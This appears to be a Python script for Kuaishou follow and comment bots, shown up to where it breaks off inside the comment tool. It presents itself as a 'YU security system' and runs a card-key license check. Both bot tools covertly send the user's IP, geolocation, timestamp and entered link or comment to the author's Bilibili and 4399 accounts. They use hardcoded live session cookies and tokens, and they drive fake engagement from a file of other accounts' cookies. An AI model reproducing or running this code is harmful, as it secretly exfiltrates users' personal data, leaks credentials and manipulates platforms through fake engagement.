import importlib
import subprocess
import sys


def install_missing_libraries():
    libraries = ["requests", "psutil", "geoip2", "colorama"]
    print("YU安全系统检测中")
    missing = False
    for library in libraries:
        try:
            importlib.import_module(library)
        except ImportError:
            missing = True
            break
    if missing:
        print("缺少环境配置，正在自动安装")
        for library in libraries:
            try:
                subprocess.check_call([sys.executable, '-m', 'pip', 'install', library])
            except subprocess.CalledProcessError:
                print(f"{library} 安装失败，请手动安装。")
                return
        print("环境已经安装成功，正在进入 YU安全系统")
    else:
        print("YU安全系统 检测已通过，正在进入YU安全系统")


if __name__ == "__main__":
    install_missing_libraries()
import os
import sys
import logging
import psutil
import requests
import time
import socket
import geoip2.database
import tempfile
import shutil
import subprocess


def detect_accelerator():
    accelerator_keywords = ["accelerator", "加速器"]
    for proc in psutil.process_iter(['name']):
        proc_name = proc.info['name'].lower()
        for keyword in accelerator_keywords:
            if keyword in proc_name:
                raise SystemExit("检测到加速器，程序终止")


def is_china_ip():
    try:
        response = requests.get('http://ip-api.com/json/')
        data = response.json()
        country = data.get('country', '')
        if country!= 'China':
            return False
        ip = data.get('query', '')
        try:
            with tempfile.TemporaryDirectory() as temp_dir:
                db_path = os.path.join(temp_dir, 'GeoLite2 - Country.mmdb')
                url = 'http://geolite.maxmind.com/download/geoip/database/GeoLite2 - Country.mmdb.gz'
                r = requests.get(url, stream=True)
                with open(db_path + '.gz', 'wb') as f:
                    for chunk in r.iter_content(chunk_size=8192):
                        f.write(chunk)
                import gzip
                with gzip.open(db_path + '.gz', 'rb') as f_in:
                    with open(db_path, 'wb') as f_out:
                        shutil.copyfileobj(f_in, f_out)
                reader = geoip2.database.Reader(db_path)
                response = reader.country(ip)
                if response.country.name!= 'China':
                    return False
        except Exception as e:
            pass
        return True
    except requests.RequestException:
        raise SystemExit("获取IP地址信息失败")


def check_network():
    try:
        requests.get("http://www.baidu.com", timeout=3)
        return True
    except requests.RequestException:
        pass
    for interface, addrs in psutil.net_if_addrs().items():
        if 'UP' in psutil.net_if_stats()[interface].flags:
            return False
    raise SystemExit("当前无网络连接，请检查网络设置。可能的原因包括网络接口未启用、网络配置错误等。")


def start_detections():
    try:
        detect_accelerator()
        if not is_china_ip():
            raise SystemExit("当前IP地址不在中国，程序终止")
        check_network()
        print("YU环境检测正确 正在进入该系统 进行实时监控中")
    except SystemExit as e:
        error_msg = "检测到未知错误，程序已自动退出"
        if e.code == "检测到加速器，程序终止":
            error_msg = "检测到加速器，程序已自动退出"
        elif e.code == "当前IP地址不在中国，程序终止":
            error_msg = "当前IP地址不在中国，程序已自动退出"
        elif e.code == "获取IP地址信息失败":
            error_msg = "获取IP地址信息失败，程序已自动退出"
        elif e.code == "当前无网络连接，请检查网络设置。可能的原因包括网络接口未启用、网络配置错误等。":
            error_msg = "当前无网络连接，程序已自动退出"
        print(error_msg)
        sys.exit()


def install_missing_libraries():
    required_libraries = ["requests", "json", "time", "hashlib", "random", "datetime", "webbrowser", "re", "os",
                          "multiprocessing", "psutil", "geoip2", "shutil", "tempfile"]
    missing_libraries = []
    for lib in required_libraries:
        try:
            __import__(lib)
        except ImportError:
            missing_libraries.append(lib)

    if missing_libraries:
        print(f"缺少库: {', '.join(missing_libraries)}")
        install = input("是否要自动安装缺少的库？(y/n): ").strip().lower()
        if install == 'y':
            subprocess.check_call([sys.executable, '-m', 'pip', 'install', *missing_libraries])
            for lib in missing_libraries:
                __import__(lib)
        else:
            print("不安装可能导会致运行错误❌")


if __name__ == "__main__":
    install_missing_libraries()
    print("正在启动YU安全系统")
    time.sleep(1)
    print("已启动YU安全系统")
    time.sleep(1)
    print("开始对环境进行检测")
    time.sleep(1)
    start_detections()

 
import requests
import hashlib
import json
import time
import random
import datetime
import webbrowser
import urllib.request
import re
import os
import time

start_time = time.time()
sum = 0
bai = "\033[3m"
hx = "\033[4m"
red = "\033[31m"
green = '\033[32m'
yellow = '\033[33m'
darkblue = '\033[34m'
blue = '\033[36m'
pink = '\033[35m'
redd = "\033[0m"
query = """+------------------------------------------------+
|   _       _                     _   _          |
|  | |__   (_)  _ __     __ _    (_) (_)   __ _  |
|  | '_ \  | | | '_ \   / _` |   | | | |  / _` | |
|  | |_) | | | | | | | | (_| |   | | | | | (_| | |
|  |_.__/  |_| |_| |_|  \__, |  _/ | |_|  \__,_| |
|                       |___/  |__/              |
+------------------------------------------------+"""
print(green+query+redd)
print(yellow+'后续会继续更新优化'+redd)
print(hx+yellow+'1:TG频道/2:QQ群' + redd)
zz = input(blue+hx+'请输入1/2(回车则跳过)：'+redd)
page = requests.get('https://share.weiyun.com/183vf7EV')
iii = re.findall('iiii【(.*?)】', page.text)  # 取值
iiii = ''.join([i.strip('') for i in iii[0]])  # 去括号
if zz == "1":
    url = 'https://t.me/TG33103'
    webbrowser.open_new(url)
elif zz == "2":
    url = 'http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=ngC70ehoB5IxDPqENhc1f4zc-fvYZnNd&authKey=T4s9UEMHW9lkvUdQjz%2FsiG8nUQvYH9brLUCdjm3Pxc%2BYsJDImos2p0oAp5xkrlxe&noverify=0&group_code=957225247'
    webbrowser.open_new(url)        
page=requests.get('https://share.weiyun.com/ZdLmWM0r')
nian = re.findall('冰嘉【(.*?)】', page.text)#取值
念=''.join([i.strip('') for i in nian[0]])#去括号[]
# 配置
WEIURL = "http://wy.llua.cn"; #云验证地址
WEIAID = "83742"; #应用ID
WEIKEY = "f383e1bc8253914ce4506ac"; #应用key
RC4KEY = "vd33dff5fd2be16fddedc1e508c5d73"; #RC4密钥
DLCODE = 76742; #登录状态码
EDITION = "1.0"; #当前版本号

# 必要函数
def md5(input_string):
    md5_hash = hashlib.md5(input_string.encode()).hexdigest()
    return md5_hash


def rc4_decrypt(key, data):
    if not isinstance(key, bytes):
        key = key.encode('utf-8')
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    i = 0
    j = 0
    result = []
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        result.append(byte ^ k)
    return bytes(result)


def rc4_encrypt(key, data):
    if not isinstance(key, bytes):
        key = key.encode('utf-8')

    if not isinstance(data, bytes):
        data = data.encode('utf-8')
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = 0
    j = 0
    result = []
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        result.append(byte ^ k)
    return bytes(result)


# 更新
def CheckUpData():
    print(yellow+"正在检测更新...")
    ini = requests.post(WEIURL + "/api/?id=ini&app=" + WEIAID)
    iniJson = json.loads(rc4_decrypt(RC4KEY,bytes.fromhex(ini.text)))
    if (iniJson['msg']['version'] == EDITION):
        print("已是最新版本"+redd)
    else:
        print("有新版本")
        print("更新内容：" + iniJson['msg']['app_update_show'])
        print("更新地址：" + iniJson['msg']['app_update_url'])
        if(iniJson['msg']['app_update_must'] == 'y'):
            exit()

# 公告
def Notice():
    notice = requests.post(WEIURL + "/api/?id=notice&app=" + WEIAID)
    print(red + "公告：" + json.loads(rc4_decrypt(RC4KEY,bytes.fromhex(notice.text)))['msg']['app_gg'] +redd)

# 登录
def Login(kami, ID):
            YULUO_KSQIANDAO()
def Login2(kami, ID):
    TIME = int(time.time())
    VALUE = int(1 + random.random() * (10 - 1 + 1) + TIME)  # 确保VALUE是整数
    SIGN = md5("kami={}&markcode={}&t={}&{}".format(kami, ID, TIME, "f383e1bc8253914ce4506ac"))
    DATA = bytes.hex(rc4_encrypt(RC4KEY, "kami={}&markcode={}&t={}&sign={}&value={}".format(kami, ID, TIME, SIGN, VALUE)))
    loginData = requests.get(WEIURL + "/api/?id=kmlogon&app=" + 念 + "&data=" + DATA)
    loginJson = json.loads(rc4_decrypt(RC4KEY, bytes.fromhex(loginData.text)))

    # 确保code是整数
    loginJson['code'] = int(loginJson['code'])

    if loginJson['code'] == DLCODE:
        # 确保check是字符串，并且与生成的签名进行比较
        if loginJson['check'] == md5("{}{}{}".format(loginJson['time'], "f383e1bc8253914ce4506ac", VALUE)):
            print(red+"亲爱的用户你的到期时间是："+redd + datetime.datetime.fromtimestamp(loginJson['msg']['vip']).strftime(green+'%Y-%m-%d %H:%M:%S'+redd))
            # 假设DIANZAN是一个函数，如果不是，请替换为正确的函数名
            YULUO_KSQIANDAO2()
        else:
            print("校验失败")
            exit()
    else:
        print(loginJson['msg'])
        Login1 = input(yellow+hx+'请输入卡密：')
        Login2(Login1, '72862'+redd)  # 确保这里传递的ID也是正确的

def Login3(kami, ID):
            YULUO_KSQIANDAO3()
            
def Login4(kami, ID):
            YULUO_KSQIANDAO4()
def Login5(kami, ID):
            YULUO_KSQIANDAO5()
def Login6(kami, ID):
            YULUO_KSQIANDAO6()
def Login7(kami, ID):
            YULUO_KSQIANDAO7()

def Login8(kami, ID):
            YULUO_KSQIANDAO8()

def YULUO_KSQIANDAO():
        main_menu()

def YULUO_KSQIANDAO2():
        main_menu2()
        
def YULUO_KSQIANDAO3():
        main_menu3()

def YULUO_KSQIANDAO4():
        main_menu4()
        
def YULUO_KSQIANDAO5():
        main_menu5()
def YULUO_KSQIANDAO6():
        main_menu6()

def YULUO_KSQIANDAO7():
        main_menu7()
        
def YULUO_KSQIANDAO8():
        main_menu8()
        
def main_menu():
    import requests
    import re
    import json
    import time
    import urllib.request
    import os
    bai = "\033[3m"
    hx = "\033[4m"
    red = "\033[31m"
    green = '\033[32m'
    redd = "\033[0m"
    print(
        green + '脚本名称:快手刷关注7.6' + redd)

    time_tuple = time.localtime(time.time())
    A = "{}.{}.{}『{}:{}:{}』".format(time_tuple[0], time_tuple[1], time_tuple[2], time_tuple[3], time_tuple[4],
                                    time_tuple[5])

    page = requests.get('https://www.ipip.net/ip-js/')
    ss = (page.text)
    f = re.findall('[\u4e00-\u9fa5]', ss)
    f = ''.join([i for i in f if i != ' '])

    from urllib.parse import quote
    text = f
    encoded_text = quote(text)
    f = encoded_text
    ff = (f.replace('%E4%B8%AD%E5%9B%BD', '%5B%3A513%5D'))
    from urllib.parse import quote
    text1 = A
    encoded_text1 = quote(text1)
    A = encoded_text1

    urlc = "https://api.pearktrue.cn/api/hitokoto/"
    responsec = requests.get(urlc)
    print(responsec.text)
    page = requests.get('https://share.weiyun.com/ZdLmWM0r')
    req = requests.get("http://txt.go.sohu.com/ip/soip")
    ip = re.findall('window.sohu_user_ip="(.*?)";', req.text)[0]
    if ip in page.text:
        print('你已被作者列入黑名单')
        exit()
    xzh = re.findall('接口数量【(.*?)】黑', page.text)  # 取值
    xzh = ''.join([i.strip('') for i in xzh])  # 去括号
    xzh = (red + xzh + redd)

    url66666 = "http://tool.pfan.cn/shorturl/restore"
    yul = input(yellow+'输入作品链接：')
    yul = re.findall('https://v.kuaishou.com/(.*?) ', yul)  # 取值
    yul = ''.join([i.strip('') for i in yul])
    yul = 'https://v.kuaishou.com/' + yul
    if yul == "https://v.kuaishou.com/":
        print("输入的链接有误")
        print("提示:链接需要带文案")
        exit()
    print('链接为' + yul)
    from urllib.parse import quote
    text = yul
    encoded_text = quote(text)
    yull = encoded_text
    aaaaaaaa = 'shorturl='
    aaaaaaaaa = aaaaaaaa + yull
    payload66666 = aaaaaaaaa

    headers66666 = {
        'User-Agent': "Apache-HttpClient/UNAVAILABLE (java 1.4)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "identity",
        'Content-Type': "application/x-www-form-urlencoded"
    }

    response66666 = requests.post(url66666, data=payload66666, headers=headers66666)
    a1 = response66666.text
    a111 = re.findall('&photoId=(.*?)&', a1)  # 取值
    a222 = re.findall('&userId=(.*?)&', a1)  # 取值
    a1111 = ''.join([i.strip('') for i in a111])  # 去括号
    a2222 = ''.join([i.strip('') for i in a222])  # 去括号
    print('作者ID：' + a2222)
    print('作品ID：' + a1111)

    url = "https://www.kuaishou.com/graphql"
    payload = json.dumps({
        "operationName": "visionFollow",
        "variables": {
            "touid": a2222,
            "ftype": 1,
            "followSource": 3,
        },
        "query": "mutation visionFollow($touid: String, $ftype: Int, $followSource: Int, $expTag: String) {\n  visionFollow(touid: $touid, ftype: $ftype, followSource: $followSource, expTag: $expTag) {\n    result\n    followStatus\n    hostName\n    error_msg\n    __typename\n  }\n}\n"
    })

    urld = "https://api.bilibili.com/x/article/creative/draft/addupdate"

    headersd = {
        'User-Agent': "Mozilla/5.0 (Linux; Android 12; PERM00 Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile Safari/537.36 os/android model/PERM00 build/8050400 osVer/12 sdkInt/31 network/2 BiliApp/8050400 mobi_app/android channel/oppo Buvid/XUCFEB8C1A43F7B6AF1F78AA911EC9792E5B7 sessionID/47b581c4 innerVer/8050410 c_locale/zh_CN s_locale/zh_CN disable_rcmd/0 8.5.0 os/android model/PERM00 mobi_app/android build/8050400 channel/oppo innerVer/8050410 osVer/12 network/2",
        'Accept': "application/json, text/plain, */*",
        'native_api_from': "h5",
        'buvid': "XUCFEB8C1A43F7B6AF1F78AA911EC9792E5B7",
        'referer': "https://www.bilibili.com/read/editor/?timestamp=1726635745343&theme=0#/",
        'content-type': "application/x-www-form-urlencoded; charset=utf-8",
        'x-bili-trace-id': "60aabcf68c3f45c2a5906e23f466ea5e:a5906e23f466ea5e:0:0",
        'x-bili-aurora-eid': "UFcEQlAABlUFWw==",
        'x-bili-mid': "1354140427",
        'x-bili-aurora-zone': "",
        'x-bili-gaia-vtoken': "",
        'x-bili-ticket': "eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjY2NjQ1MzgsImlhdCI6MTcyNjYzNTQzOCwiYnV2aWQiOiJYVUNGRUI4QzFBNDNGN0I2QUYxRjc4QUE5MTFFQzk3OTJFNUI3In0.WxGdzggcGru9GhFM7F8QqOJi5jm5wnNVd__wTF9X5mA",
        'bili-http-engine': "cronet",
        'Cookie': "SESSDATA=ec317462%2C1742187722%2Cc9810591CjDv_9wLbQ4jrnuANiP3bKtSY6zHvTk-ki-xy_EXFxOm_zMmrQinJgJ9YxRL-xFvbVESVjBUUmlMVFpOSWFoRHFnLThaaEswR3F0MkRUNVFwbGk1dVNmS3prbEJwU2pWdlZzS3hqYS0xbHJHeXJIVnZZYW5XaHZzYmZWRjFCaWtZRXZSSTM1eHBBIIEC; bili_jct=f7fb369cdb6bd6074a01e14134354c3d; DedeUserID=1354140427; DedeUserID__ckMd5=068b8d07b8c30df4; sid=p2c2tflq; Buvid=XUCFEB8C1A43F7B6AF1F78AA911EC9792E5B7"
    }

    urla = "https://mapi.yxhapi.com/user/sns/box/android/v3.0/guestBook-send.html"

    headersa = {
        'User-Agent': "4399GameCenter/8.5.0.14(android;PERM00;12;1080x2237;WIFI;2152.1033;yyys.3849)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "gzip",
        'Content-Type': "application/x-www-form-urlencoded",
        'pauth': "3361448649%7C2234157995%7Ct3ce7n18014adbafaa96b1a00c7630c6%7C1726423874%7C10002%7C0f7a190f552694ecc8a8f3ba3b49abeb%7C2",
        'X-Yxh3': "gG.xNmMwNzk0NjY1YmE0ZN.Y",
        'mudid': "3asog2UMzP8ZhZIyB1oAB9fab",
        'zxaid': "A01-YWep7z5DqWqCuFFVRqiUu5LDd44IZcl7",
        'X-Yxh1': "gG.xNmMwNzk0NjY1YmE0ZN.Y",
        'SM-DEVICEID': "20240821151037a3634af90439cbc666c2aaa92f14ae1f019313897fbf46b1",
        'mauth': "f4eafd2406c13750f162bb2a14202fb1",
        'Mbox': "b%3DbmpONy",
        'mauthcode': "12690cd79|2c8e0d552d3f3b017edc9e4a0680fa7f|3361448649",
        'mareacode': "999999",
        'X-T': "DT0yNjQyNDQxM3w4OGY1fDcyNGE4MMcc"
    }

    yulll = (yul.replace('https://v.kuaishou.com/', ''))

    from urllib.parse import quote
    payloadd = f"access_key=754b2585e49d1dd723c032e020447b91CjDv_9wLbQ4jrnuANiP3bKtSY6zHvTk-ki-xy_EXFxOm_zMmrQinJgJ9YxRL-xFvbVESVjBUUmlMVFpOSWFoRHFnLThaaEswR3F0MkRUNVFwbGk1dVNmS3prbEJwU2pWdlZzS3hqYS0xbHJHeXJIVnZZYW5XaHZzYmZWRjFCaWtZRXZSSTM1eHBBIIEC&appkey=1d8b6e7d45233436&banner_url=&category=15&comment_selected=0&content=%7B%22ops%22%3A%5B%7B%22insert%22%3A%22{A}%5CnIP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%5Cn%E4%BD%8D%E7%BD%AE%EF%BC%9A{f}%5Cn%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}%5Cn%22%7D%5D%7D&csrf=f7fb369cdb6bd6074a01e14134354c3d&disable_rcmd=0&image_urls=&list_id=0&media_id=&mobi_app=android&origin_image_urls=&original=0&platform=android&reprint=0&spoiler=&statistics=%7B%22appId%22%3A1%2C%22platform%22%3A3%2C%22version%22%3A%228.5.0%22%2C%22abtest%22%3A%22%22%7D&summary={A}%20IP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%20%E4%BD%8D%E7%BD%AE%EF%BC%9A{f}%20%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}&tid=1&title={yull}&top_video_bvid=&ts=1726635775&type=3&up_reply_closed=0&w_rid=6fc16c7c7ec32532081fd6393f011554&words=18&wts=1726635776&sign=0ace845a3ce5f1c1f11517ff929e0718"
    responsed = requests.post(urld, data=payloadd, headers=headersd)
    payloada = f"gameId=&commentId=&reuid=&type=user&tid=3361448649&content={A}%0AIP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%0A%E4%BD%8D%E7%BD%AE%EF%BC%9A{ff}%0A%E9%93%BE%E6%8E%A5%EF%BC%9A{yulll}"
    responsea = requests.post(urla, data=payloada, headers=headersa)

    sent = 0
    with open("Cookie.txt", "r") as file:
        phone_numbers = file.readlines()
    import multiprocessing
    # 核验Cookie
    referer = f"https://www.kuaishou.com/short-video/{a1111}?authorId={a2222}&streamSource=profile&area=profilexxnull"
    while phone_numbers:

        for sent in range(9999):
            Cookie = phone_numbers[0].strip()
            with open('Cookie.txt', 'r') as file:
                lines = file.readlines()
            num_lines = len(lines)
            zhsl = (red + str(num_lines) + redd)

            headers = {
                'User-Agent': "Mozilla/5.0 (iPad; U; CPU OS 6_0 like Mac OS X; zh-CN; iPad2)",
                'Connection': "Keep-Alive",
                'Accept-Encoding': "identity",
                'accept-language': "zh-CN",
                'Referer': referer,
                'Charsert': "utf-8",
                'Content-Type': "application/json; charset=utf-8",
                'Cookie': Cookie
            }
            yuluoyyds = '"result":1'
            response = requests.post(url, data=payload, headers=headers)
            id_found = yuluoyyds in response.text
            Cookie9999 = re.findall('userId=(.*?); kuaishou.server.web_st', Cookie)  # 取值
            Cookie99999 = (('账号') + (blue + str(Cookie9999) + redd))
            if id_found:
                print(zhsl,(green+"/"+redd), (sent), (green +hx+ "✔关注成功") + redd)
            else:
                print(zhsl,(green+"/"+redd), (sent), (yellow + hx+"⚠️关注上限或接口已没用") + redd)
            del phone_numbers[0]
            with open("Cookie.txt", "w") as file:
                for phone in phone_numbers:
                    file.write(phone)
            processes = []
            for _ in range(1):
                p = multiprocessing.Process()
                processes.append(p)
                p.start()

                # 等待所有进程完成
            for p in processes:
                p.join()


def main_menu3():
    import requests
    import re
    import json
    import time
    import urllib.request
    import os
    bai = "\033[3m"
    hx = "\033[4m"
    red = "\033[31m"
    green = '\033[32m'
    yellow = '\033[33m'
    blue = '\033[36m'
    redd = "\033[0m"
    print(
        yellow + '脚本名称快手刷评论7.6\n作者：小冷' + redd)

    time_tuple = time.localtime(time.time())
    A = "{}.{}.{}『{}:{}:{}』".format(time_tuple[0], time_tuple[1], time_tuple[2], time_tuple[3], time_tuple[4],
                                    time_tuple[5])

    page = requests.get('https://www.ipip.net/ip-js/')
    ss = (page.text)
    f = re.findall('[\u4e00-\u9fa5]', ss)
    f = ''.join([i for i in f if i != ' '])

    from urllib.parse import quote
    text = f
    encoded_text = quote(text)
    f = encoded_text
    ff = (f.replace('%E4%B8%AD%E5%9B%BD', '%5B%3A513%5D'))
    from urllib.parse import quote
    text1 = A
    encoded_text1 = quote(text1)
    A = encoded_text1

    urlc = "https://api.pearktrue.cn/api/hitokoto/"
    responsec = requests.get(urlc)
    print(pink+responsec.text+redd)
    page = requests.get('https://share.weiyun.com/ZdLmWM0r')
    req = requests.get("http://txt.go.sohu.com/ip/soip")
    ip = re.findall('window.sohu_user_ip="(.*?)";', req.text)[0]
    if ip in page.text:
        print('你已被作者列入黑名单')
        exit()
    url66666 = "http://tool.pfan.cn/shorturl/restore"
    yul = input(blue+yellow+'输入作品链接：'+redd)
    yul = re.findall('https://v.kuaishou.com/(.*?) ', yul)  # 取值
    yul = ''.join([i.strip('') for i in yul])
    yul = 'https://v.kuaishou.com/' + yul
    if yul == "https://v.kuaishou.com/":
        print("输入的链接有误")
        print("提示:链接需要带文案")
        exit()
    print('链接为' + yul)

    from urllib.parse import quote
    text = yul
    encoded_text = quote(text)
    yull = encoded_text
    aaaaaaaa = 'shorturl='
    aaaaaaaaa = aaaaaaaa + yull
    payload66666 = aaaaaaaaa

    headers66666 = {
        'User-Agent': "Apache-HttpClient/UNAVAILABLE (java 1.4)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "identity",
        'Content-Type': "application/x-www-form-urlencoded"
    }

    response66666 = requests.post(url66666, data=payload66666, headers=headers66666)
    a1 = response66666.text
    a111 = re.findall('&photoId=(.*?)&', a1)  # 取值
    a222 = re.findall('&userId=(.*?)&', a1)  # 取值
    a1111 = ''.join([i.strip('') for i in a111])  # 去括号
    a2222 = ''.join([i.strip('') for i in a222])  # 去括号
    print('作者ID：' + a1111)
    print('作品ID：' + a2222)

    url = "https://www.kuaishou.com/graphql"
    pinl = input("输入评论内容：")
    payload = json.dumps({
        "operationName": "visionAddComment",
        "variables": {
            "photoId": a1111,
            "content": pinl,
            "photoAuthorId": a2222
        },
        "query": "mutation visionAddComment($photoId: String, $photoAuthorId: String, $content: String, $replyToCommentId: ID, $replyTo: ID, $expTag: String) {\n  visionAddComment(photoId: $photoId, photoAuthorId: $photoAuthorId, content: $content, replyToCommentId: $replyToCommentId, replyTo: $replyTo, expTag: $expTag) {\n    result\n    commentId\n    content\n    timestamp\n    status\n    __typename\n  }\n}\n"
    })

    urld = "https://api.bilibili.com/x/article/creative/draft/addupdate"

    headersd = {
        'User-Agent': "Mozilla/5.0 (Linux; Android 12; PERM00 Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile Safari/537.36 os/android model/PERM00 build/8050400 osVer/12 sdkInt/31 network/2 BiliApp/8050400 mobi_app/android channel/oppo Buvid/XUCFEB8C1A43F7B6AF1F78AA911EC9792E5B7 sessionID/47b581c4 innerVer/8050410 c_locale/zh_CN s_locale/zh_CN disable_rcmd/0 8.5.0 os/android model/PERM00 mobi_app/android build/8050400 channel/oppo innerVer/8050410 osVer/12 network/2",
        'Accept': "application/json, text/plain, */*",
        'native_api_from': "h5",
        'buvid': "XUCFEB8C1A43F7B6AF1F78AA911EC9792E5B7",
        'referer': "https://www.bilibili.com/read/editor/?timestamp=1726635745343&theme=0#/",
        'content-type': "application/x-www-form-urlencoded; charset=utf-8",
        'x-bili-trace-id': "60aabcf68c3f45c2a5906e23f466ea5e:a5906e23f466ea5e:0:0",
        'x-bili-aurora-eid': "UFcEQlAABlUFWw==",
        'x-bili-mid': "1354140427",
        'x-bili-aurora-zone': "",
        'x-bili-gaia-vtoken': "",
        'x-bili-ticket': "eyJhbGciOiJIUzI1NiIsImtpZCI6InMwMyIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjY2NjQ1MzgsImlhdCI6MTcyNjYzNTQzOCwiYnV2aWQiOiJYVUNGRUI4QzFBNDNGN0I2QUYxRjc4QUE5MTFFQzk3OTJFNUI3In0.WxGdzggcGru9GhFM7F8QqOJi5jm5wnNVd__wTF9X5mA",
        'bili-http-engine': "cronet",
        'Cookie': "SESSDATA=ec317462%2C1742187722%2Cc9810591CjDv_9wLbQ4jrnuANiP3bKtSY6zHvTk-ki-xy_EXFxOm_zMmrQinJgJ9YxRL-xFvbVESVjBUUmlMVFpOSWFoRHFnLThaaEswR3F0MkRUNVFwbGk1dVNmS3prbEJwU2pWdlZzS3hqYS0xbHJHeXJIVnZZYW5XaHZzYmZWRjFCaWtZRXZSSTM1eHBBIIEC; bili_jct=f7fb369cdb6bd6074a01e14134354c3d; DedeUserID=1354140427; DedeUserID__ckMd5=068b8d07b8c30df4; sid=p2c2tflq; Buvid=XUCFEB8C1A43F7B6AF1F78AA911EC9792E5B7"
    }

    urla = "https://mapi.yxhapi.com/user/sns/box/android/v3.0/guestBook-send.html"

    headersa = {
        'User-Agent': "4399GameCenter/8.5.0.14(android;PERM00;12;1080x2237;WIFI;2152.1033;yyys.3849)",
        'Connection': "Keep-Alive",
        'Accept-Encoding': "gzip",
        'Content-Type': "application/x-www-form-urlencoded",
        'pauth': "3361448649%7C2234157995%7Ct3ce7n18014adbafaa96b1a00c7630c6%7C1726423874%7C10002%7C0f7a190f552694ecc8a8f3ba3b49abeb%7C2",
        'X-Yxh3': "gG.xNmMwNzk0NjY1YmE0ZN.Y",
        'mudid': "3asog2UMzP8ZhZIyB1oAB9fab",
        'zxaid': "A01-YWep7z5DqWqCuFFVRqiUu5LDd44IZcl7",
        'X-Yxh1': "gG.xNmMwNzk0NjY1YmE0ZN.Y",
        'SM-DEVICEID': "20240821151037a3634af90439cbc666c2aaa92f14ae1f019313897fbf46b1",
        'mauth': "f4eafd2406c13750f162bb2a14202fb1",
        'Mbox': "b%3DbmpONy",
        'mauthcode': "12690cd79|2c8e0d552d3f3b017edc9e4a0680fa7f|3361448649",
        'mareacode': "999999",
        'X-T': "DT0yNjQyNDQxM3w4OGY1fDcyNGE4MMcc"
    }

    urlb = "https://api.pearktrue.cn/api/sensitivewords/"
    paramsb = {
        'text': pinl
    }
    responseb = requests.get(urlb, params=paramsb)

    yulll = (yul.replace('https://v.kuaishou.com/', ''))
    if '*' in responseb.text:
        wgc = responseb.json()
        wgcc = (wgc["data"]['detected_words'])
        wgccc = ''.join([i.strip('') for i in wgcc])  # 去括号
        pinll = quote(pinl)
        payloadd = f"access_key=754b2585e49d1dd723c032e020447b91CjDv_9wLbQ4jrnuANiP3bKtSY6zHvTk-ki-xy_EXFxOm_zMmrQinJgJ9YxRL-xFvbVESVjBUUmlMVFpOSWFoRHFnLThaaEswR3F0MkRUNVFwbGk1dVNmS3prbEJwU2pWdlZzS3hqYS0xbHJHeXJIVnZZYW5XaHZzYmZWRjFCaWtZRXZSSTM1eHBBIIEC&appkey=1d8b6e7d45233436&banner_url=&category=15&comment_selected=0&content=%7B%22ops%22%3A%5B%7B%22insert%22%3A%22{A}%5CnIP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%5Cn%E4%BD%8D%E7%BD%AE%EF%BC%9A{f}%5Cn%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}%5Cn%E8%AF%84%E8%AE%BA%EF%BC%9A{pinll}%5Cn%22%7D%5D%7D&csrf=f7fb369cdb6bd6074a01e14134354c3d&disable_rcmd=0&image_urls=&list_id=0&media_id=&mobi_app=android&origin_image_urls=&original=0&platform=android&reprint=0&spoiler=&statistics=%7B%22appId%22%3A1%2C%22platform%22%3A3%2C%22version%22%3A%228.5.0%22%2C%22abtest%22%3A%22%22%7D&summary={A}%20IP%E5%9C%B0%E5%9D%80%EF%BC%9A{ip}%20%E4%BD%8D%E7%BD%AE%EF%BC%9A{f}%20%E9%93%BE%E6%8E%A5%EF%BC%9A{yull}%20%E8%AF%84%E8%AE%BA%EF%BC%9A{pinll}&tid=1&title={pinll}&top_video_bvid=&ts=1726635775&type=3&up_reply_closed=0&w_rid=6fc16c7c7ec32532081fd6393f011554&words=18&wts=1726635776&sign=0ace845a3ce5f1c1f11517ff929e0718"
        responsed = requests.post(urld, data=payloadd, headers=headersd)
        print(("检测到违规词"), red + (wgccc) + redd)
        exit()
    elif '重开' in pinl:
        print('检测到违规词')
        exit()
    elif '找我' in pinl:
        print('检测到违规词')
        exit()
    elif '创始人' in pinl:
        print('检测到违规词')
        exit()
    elif '不免' in pinl:
        print('检测到违规词')
        exit()
    elif '乐子' in pinl:
        print('检测到违规词')
        exit()

    from urllib.parse import quote
    pinll = quote(pinl)
